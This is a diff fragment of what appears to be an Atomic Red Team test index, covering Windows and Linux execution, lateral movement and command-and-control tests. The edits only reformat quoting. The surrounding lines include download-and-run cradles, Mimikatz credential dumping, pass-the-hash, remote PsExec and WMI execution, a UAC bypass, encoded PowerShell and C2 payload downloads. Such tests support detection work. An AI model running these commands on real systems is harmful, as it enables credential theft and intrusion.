Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore - ' +' name: powershell - name: OSTap Payload Download auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 description: 'Uses cscript //E:jscript to download a file - ' +' supported_platforms: - windows input_arguments: 
@@ -59688,7 +59688,7 @@ execution: cscript //E:Jscript #{script_file} cleanup_command: 'del #{script_file} /F /Q >nul 2>&1 - ' +' name: command_prompt - name: Maldoc choice flags command execution auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 @@ -59706,7 +59706,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -59717,7 +59717,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -59745,7 +59745,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -59756,7 +59756,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -59783,7 +59783,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -59794,7 +59794,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -59826,7 +59826,7 @@ execution: dependencies: - description: 'Microsoft Excel must be installed - ' +' prereq_command: | try { New-Object -COMObject "Excel.Application" | Out-Null 
@@ -59836,7 +59836,7 @@ execution:
 get_prereq_command: 'Write-Host "You will need to install Microsoft Excel manually to meet this requirement"
- '
+'
 executor: command: | $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
@@ -59908,7 +59908,7 @@ execution:
 dependencies: - description: 'Microsoft Word must be installed
- '
+'
 prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application"
@@ -59917,10 +59917,10 @@ execution:
 get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement"
- '
+'
 - description: 'Google Chrome must be installed
- '
+'
 prereq_command: | try { $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
@@ -59929,7 +59929,7 @@ execution:
 get_prereq_command: 'Write-Host "You will need to install Google Chrome manually to meet this requirement"
- '
+'
 executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -59947,7 +59947,7 @@ execution:
 instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection).
- '
+'
 supported_platforms: - windows input_arguments:
@@ -59967,7 +59967,7 @@ execution:
 & "#{pua_file}" cleanup_command: 'Remove-Item #{pua_file}
- '
+'
 - name: Office Generic Payload Download auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c description: |
@@ -59982,14 +59982,14 @@ execution:
 macro_path: description: 'Location of file which will be converted to a VBA macro
- '
+'
 type: Path default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt c2_domain: description: 'This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory.
- '
+'
 type: url default: "$false" c2_parent_directory:
@@ -60008,7 +60008,7 @@ execution:
 ms_product: description: 'Maldoc application Word or Excel
- '
+'
 type: String default: Word dependency_executor_name: powershell
@@ -60016,17 +60016,17 @@ execution:
 - description: 'Destination c2_domain name or IP address must be set to a running HTTP server.
- '
+'
 prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1)
- '
+'
 get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service"
- '
+'
 - description: 'Microsoftt #{ms_product} must be installed
- '
+'
 prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -60037,7 +60037,7 @@ execution:
 get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
- '
+'
 executor: name: powershell command: |
@@ -60050,7 +60050,7 @@ execution:
 cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore
- '
+'
 T1204.003: technique: external_references:
@@ -60392,7 +60392,7 @@ execution:
 description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed.
- '
+'
 supported_platforms: - windows input_arguments:
@@ -60404,7 +60404,7 @@ execution:
 command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}''); Invoke-Mimikatz -DumpCreds"
- '
+'
 name: command_prompt elevation_required: true - name: Run BloodHound from local disk
@@ -60424,15 +60424,15 @@ execution:
 dependencies: - description: 'SharpHound.ps1 must be located at #{file_path}
- '
+'
 prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1}
- '
+'
 get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1"
- '
+'
 executor: command: | write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
@@ -60441,7 +60441,7 @@ execution:
 Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force
- '
+'
 name: powershell - name: Run Bloodhound from Memory using Download Cradle auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7
@@ -60459,7 +60459,7 @@ execution:
 Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force
- '
+'
 name: powershell - name: Obfuscation Tests auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804
@@ -60467,7 +60467,7 @@ execution:
 out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
- '
+'
 supported_platforms: - windows executor:
@@ -60482,7 +60482,7 @@ execution:
 will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed.
- '
+'
 supported_platforms: - windows executor:
@@ -60513,7 +60513,7 @@ execution:
 command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1''); Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''"
- '
+'
 name: command_prompt - name: Powershell MsXml COM object - with prompt auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
@@ -60533,7 +60533,7 @@ execution:
 MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
- '
+'
 name: command_prompt - name: Powershell XML requests auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6
@@ -60553,7 +60553,7 @@ execution:
 bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute | IEX"
- '
+'
 name: command_prompt - name: Powershell invoke mshta.exe download auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af
@@ -60571,7 +60571,7 @@ execution:
 executor: command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()"
- '
+'
 name: command_prompt - name: Powershell Invoke-DownloadCradle auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
@@ -60613,26 +60613,26 @@ execution:
 dependencies: - description: 'PowerShell version 2 must be installed
- '
+'
 prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1}
- '
+'
 get_prereq_command: 'Write-Host Automated installer not implemented yet, please install PowerShell v2 manually
- '
+'
 executor: command: 'powershell.exe -version 2 -Command Write-Host $PSVersion
- '
+'
 name: powershell - name: NTFS Alternate Data Stream Access auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 description: 'Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed.
- '
+'
 supported_platforms: - windows input_arguments:
@@ -60643,14 +60643,14 @@ execution:
 dependencies: - description: 'Homedrive must be an NTFS drive
- '
+'
 prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1}
- '
+'
 get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically
- '
+'
 executor: name: powershell command: |
@@ -60659,7 +60659,7 @@ execution:
 Invoke-Expression $streamcommand cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore
- '
+'
 - name: PowerShell Session Creation and Use auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd description: |
@@ -60676,12 +60676,12 @@ execution:
 dependencies: - description: 'PSRemoting must be enabled
- '
+'
 prereq_command: "Try {\n New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: 'Enable-PSRemoting
- '
+'
 executor: name: powershell elevation_required: true
@@ -60715,7 +60715,7 @@ execution:
 get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
- '
+'
 executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction
@@ -60751,7 +60751,7 @@ execution:
 get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
- '
+'
 executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation
@@ -60782,7 +60782,7 @@ execution:
 get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
- '
+'
 executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute
@@ -60818,7 +60818,7 @@ execution:
 get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
- '
+'
 executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments
@@ -60831,7 +60831,7 @@ execution:
 outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
- '
+'
 supported_platforms: - windows input_arguments:
@@ -60842,7 +60842,7 @@ execution:
 executor: command: 'powershell.exe -e #{obfuscated_code}
- '
+'
 name: command_prompt - name: PowerShell Invoke Known Malicious Cmdlets auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3
@@ -60864,7 +60864,7 @@ execution:
 "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord"
- '
+'
 executor: name: powershell elevation_required: true
@@ -60950,13 +60950,13 @@ execution:
 $which_python -c 'import requests' 2>/dev/null; echo $? get_prereq_command: 'pip install requests
- '
+'
 executor: command: '$which_python -c ''import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)''
- '
+'
 name: sh cleanup_command: "rm #{payload_file_name} \n" - name: Execute Python via scripts (Linux)
@@ -60992,7 +60992,7 @@ execution:
 dependencies: - description: 'Requires Python
- '
+'
 prereq_command: | which_python=`which python`; python -V $which_python -c 'import requests' 2>/dev/null; echo $?
@@ -61018,7 +61018,7 @@ execution:
 an external malicious script then executes locally using the supplied executor and arguments
- '
+'
 supported_platforms: - linux input_arguments:
@@ -61052,7 +61052,7 @@ execution:
 dependencies: - description: 'Requires Python
- '
+'
 prereq_command: | which_python=`which python`; python -V $which_python -c 'import requests' 2>/dev/null; echo $?
@@ -61074,7 +61074,7 @@ execution:
 name: sh cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name}
- '
+'
 T1053.005: technique: created: '2019-11-27T14:58:00.429Z'
@@ -61172,7 +61172,7 @@ execution:
 description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10.
- '
+'
 supported_platforms: - windows input_arguments:
@@ -61189,10 +61189,10 @@ execution:
 elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
- '
+'
 cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1
- '
+'
 - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: |
@@ -61228,11 +61228,11 @@ execution:
 command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
- '
+'
 cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1
- '
+'
 - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: |
@@ -61254,7 +61254,7 @@ execution:
 cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
- '
+'
 - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: |
@@ -61271,7 +61271,7 @@ execution:
 dependencies: - description: 'Microsoft #{ms_product} must be installed
- '
+'
 prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -61282,7 +61282,7 @@ execution:
 get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
- '
+'
 executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -61295,7 +61295,7 @@ execution:
 login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes.
- '
+'
 supported_platforms: - windows executor:
@@ -61307,7 +61307,7 @@ execution:
 cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1
- '
+'
 T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9
@@ -61521,7 +61521,7 @@ execution:
 sc.exe delete #{service_name} cleanup_command: 'del C:\art-marker.txt >nul 2>&1
- '
+'
 name: command_prompt elevation_required: true - name: Use PsExec to execute a command on a remote host
@@ -61555,10 +61555,10 @@ execution:
 - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
- '
+'
 prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
- '
+'
 get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -61568,7 +61568,7 @@ execution:
 command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe"
- '
+'
 name: command_prompt T1129: technique:
@@ -61701,7 +61701,7 @@ execution:
 description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
- '
+'
 supported_platforms: - windows input_arguments:
@@ -61717,10 +61717,10 @@ execution:
 - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe})
- '
+'
 prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
- '
+'
 get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
@@ -61993,7 +61993,7 @@ execution:
 auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 description: 'Creates and executes a simple bash script.
- '
+'
 supported_platforms: - macos - linux
@@ -62010,7 +62010,7 @@ execution:
 sh #{script_path} cleanup_command: 'rm #{script_path}
- '
+'
 name: sh - name: Command-Line Interface auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c
@@ -62027,7 +62027,7 @@ execution:
 wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash cleanup_command: 'rm /tmp/art-fish.txt
- '
+'
 name: sh T1204: technique:
@@ -62184,7 +62184,7 @@ execution:
 dependencies: - description: 'The 64-bit version of Microsoft Office must be installed
- '
+'
 prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application"
@@ -62195,7 +62195,7 @@ execution:
 get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
- '
+'
 executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -62204,7 +62204,7 @@ execution:
 cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
- '
+'
 name: powershell - name: Extract Memory via VBA auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6
@@ -62223,7 +62223,7 @@ execution:
 dependencies: - description: 'Microsoft #{ms_product} must be installed
- '
+'
 prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -62234,7 +62234,7 @@ execution:
 get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement"
- '
+'
 executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\"
@@ -62243,7 +62243,7 @@ execution:
 cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore
- '
+'
 name: powershell T1059.003: technique:
@@ -62294,7 +62294,7 @@ execution:
 description: 'Creates and executes a simple batch script. Upon execution, CMD will briefly launch to run the batch script then close again.
- '
+'
 supported_platforms: - windows input_arguments:
@@ -62310,27 +62310,27 @@ execution:
 dependencies: - description: 'Batch file must exist on disk at specified location (#{script_path})
- '
+'
 prereq_command: 'if (Test-Path #{script_path}) {exit 0} else {exit 1}
- '
+'
 get_prereq_command: | New-Item #{script_path} -Force | Out-Null Set-Content -Path #{script_path} -Value "#{command_to_execute}" executor: command: 'Start-Process #{script_path}
- '
+'
 cleanup_command: 'Remove-Item #{script_path} -Force -ErrorAction Ignore
- '
+'
 name: powershell - name: Writes text to a file and displays it. auto_generated_guid: 127b4afe-2346-4192-815c-69042bec570e description: 'Writes text to a file and display the results. This test is intended to emulate the dropping of a malicious file to disk.
- '
+'
 supported_platforms: - windows input_arguments:
@@ -62345,17 +62345,17 @@ execution:
 executor: command: 'echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
- '
+'
 cleanup_command: 'del "#{file_contents_path}"
- '
+'
 name: command_prompt - name: Suspicious Execution via Windows Command Shell auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20 description: 'Command line executed via suspicious invocation. Example is from the 2021 Threat Detection Report by Red Canary.
- '
+'
 supported_platforms: - windows input_arguments:
@@ -62446,7 +62446,7 @@ execution:
 executor: command: 'wmic useraccount get /ALL /format:csv
- '
+'
 name: command_prompt - name: WMI Reconnaissance Processes auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2
@@ -62458,7 +62458,7 @@ execution:
 executor: command: 'wmic process get caption,executablepath,commandline /format:csv
- '
+'
 name: command_prompt - name: WMI Reconnaissance Software auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414
@@ -62470,7 +62470,7 @@ execution:
 executor: command: 'wmic qfe get description,installedOn /format:csv
- '
+'
 name: command_prompt - name: WMI Reconnaissance List Remote Services auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3
@@ -62494,7 +62494,7 @@ execution:
 executor: command: 'wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
- '
+'
 name: command_prompt - name: WMI Execute Local Process auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3
@@ -62511,11 +62511,11 @@ execution:
 executor: command: 'wmic process call create #{process_to_execute}
- '
+'
 cleanup_command: 'wmic process where name=''#{process_to_execute}'' delete >nul 2>&1
- '
+'
 name: command_prompt - name: WMI Execute Remote Process auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b
@@ -62546,11 +62546,11 @@ execution:
 command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute}
- '
+'
 cleanup_command: 'wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name=''#{process_to_execute}'' delete >nul 2>&1
- '
+'
 name: command_prompt - name: Create a Process using WMI Query and an Encoded Command auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c
@@ -62567,7 +62567,7 @@ execution:
 executor: command: 'powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA
- '
+'
 name: command_prompt - name: Create a Process using obfuscated Win32_Process auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43
@@ -62880,7 +62880,7 @@ lateral-movement:
 command: '[activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7")
- '
+'
 name: powershell T1210: technique:
@@ -63133,7 +63133,7 @@ lateral-movement:
 - description: 'Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
- '
+'
 prereq_command: | $mimikatz_path = cmd /c echo #{mimikatz_path} if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -63147,13 +63147,13 @@ lateral-movement:
 command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}"
- '
+'
 name: command_prompt - name: crackmapexec Pass the Hash auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9 description: 'command execute with crackmapexec
- '
+'
 supported_platforms: - windows input_arguments:
@@ -63182,18 +63182,18 @@ lateral-movement:
 - description: 'CrackMapExec executor must exist on disk at specified location (#{crackmapexec_exe})
- '
+'
 prereq_command: 'if(Test-Path #{crackmapexec_exe}) { 0 } else { -1 }
- '
+'
 get_prereq_command: 'Write-Host Automated installer not implemented yet, please install crackmapexec manually at this location: #{crackmapexec_exe}
- '
+'
 executor: command: 'crackmapexec #{domain} -u #{user_name} -H #{ntlm} -x #{command}
- '
+'
 name: command_prompt T1550.003: technique:
@@ -63272,7 +63272,7 @@ lateral-movement:
 auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098 description: 'Similar to PTH, but attacking Kerberos
- '
+'
 supported_platforms: - windows input_arguments:
@@ -63292,10 +63292,10 @@ lateral-movement:
 dependencies: - description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe})
- '
+'
 prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
- '
+'
 get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\Mimi.zip"
@@ -63384,7 +63384,7 @@ lateral-movement:
 net start sesshijack cleanup_command: 'sc.exe delete sesshijack >nul 2>&1
- '
+'
 name: command_prompt elevation_required: true T1021.001:
@@ -63456,7 +63456,7 @@ lateral-movement:
 auto_generated_guid: 355d4632-8cb9-449d-91ce-b566d0253d3e description: 'Attempt an RDP session via Remote Desktop Application to a DomainController.
- '
+'
 supported_platforms: - windows input_arguments:
@@ -63479,15 +63479,15 @@ lateral-movement:
 dependencies: - description: 'Computer must be domain joined
- '
+'
 prereq_command: 'if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) { exit 0} else { exit 1}
- '
+'
 get_prereq_command: 'Write-Host Joining this computer to a domain must be done manually
- '
+'
 executor: command: | $Server=#{logonserver}
@@ -63504,7 +63504,7 @@ lateral-movement:
 auto_generated_guid: 7382a43e-f19c-46be-8f09-5c63af7d3e2b description: 'Attempt an RDP session via Remote Desktop Application over Powershell
- '
+'
 supported_platforms: - windows input_arguments:
@@ -63769,7 +63769,7 @@ lateral-movement:
 auto_generated_guid: 3386975b-367a-4fbb-9d77-4dcf3639ffd3 description: 'Connecting To Remote Shares
- '
+'
 supported_platforms: - windows input_arguments:
@@ -63793,13 +63793,13 @@ lateral-movement:
 command: 'cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
- '
+'
 name: command_prompt - name: Map Admin Share PowerShell auto_generated_guid: 514e9cd7-9207-4882-98b1-c8f791bae3c5 description: 'Map Admin share utilizing PowerShell
- '
+'
 supported_platforms: - windows input_arguments:
@@ -63818,14 +63818,14 @@ lateral-movement:
 executor: command: 'New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
- '
+'
 name: powershell - name: Copy and Execute File with PsExec auto_generated_guid: 0eb03d41-79e4-4393-8e57-6344856be1cf description: 'Copies a file to a remote host and executes it using PsExec. Requires the download of PsExec from [https://docs.microsoft.com/en-us/sysinternals/downloads/psexec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec).
- '
+'
 supported_platforms: - windows input_arguments:
@@ -63846,10 +63846,10 @@ lateral-movement:
 - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe})
- '
+'
 prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1}
- '
+'
 get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
@@ -63879,7 +63879,7 @@ lateral-movement:
 command: 'cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
- '
+'
 name: command_prompt elevation_required: true T1021.004:
@@ -64110,7 +64110,7 @@ lateral-movement:
 description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console.
- '
+'
 supported_platforms: - windows input_arguments:
@@ -64126,10 +64126,10 @@ lateral-movement:
 - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe})
- '
+'
 prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1)
- '
+'
 get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer}
@@ -64422,7 +64422,7 @@ lateral-movement:
 executor: command: 'Enable-PSRemoting -Force
- '
+'
 name: powershell elevation_required: true - name: Invoke-Command
@@ -64445,7 +64445,7 @@ lateral-movement:
 executor: command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
- '
+'
 name: powershell - name: WinRM Access with Evil-WinRM auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
@@ -64805,7 +64805,7 @@ command-and-control:
 "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
- '
+'
 name: powershell - name: DNS Regular Beaconing auto_generated_guid: 3efc144e-1af8-46bb-8ca2-1376bb6db8b6
@@ -65603,7 +65603,7 @@ command-and-control:
 auto_generated_guid: 0fc6e977-cb12-44f6-b263-2824ba917409 description: 'Utilize rsync to perform a remote file copy (push)
- '
+'
 supported_platforms: - linux - macos
@@ -65627,13 +65627,13 @@ command-and-control:
 executor: command: 'rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path}
- '
+'
 name: bash - name: rsync remote file copy (pull) auto_generated_guid: 3180f7d5-52c0-4493-9ea0-e3431a84773f description: 'Utilize rsync to perform a remote file copy (pull)
- '
+'
 supported_platforms: - linux - macos
@@ -65657,13 +65657,13 @@ command-and-control:
 executor: command: 'rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path}
- '
+'
 name: bash - name: scp remote file copy (push) auto_generated_guid: 83a49600-222b-4866-80a0-37736ad29344 description: 'Utilize scp to perform a remote file copy (push)
- '
+'
 supported_platforms: - linux - macos
@@ -65687,13 +65687,13 @@ command-and-control:
 executor: command: 'scp #{local_file} #{username}@#{remote_host}:#{remote_path}
- '
+'
 name: bash - name: scp remote file copy (pull) auto_generated_guid: b9d22b9a-9778-4426-abf0-568ea64e9c33 description: 'Utilize scp to perform a remote file copy (pull)
- '
+'
 supported_platforms: - linux - macos
@@ -65717,13 +65717,13 @@ command-and-control:
 executor: command: 'scp #{username}@#{remote_host}:#{remote_file} #{local_path}
- '
+'
 name: bash - name: sftp remote file copy (push) auto_generated_guid: f564c297-7978-4aa9-b37a-d90477feea4e description: 'Utilize sftp to perform a remote file copy (push)
- '
+'
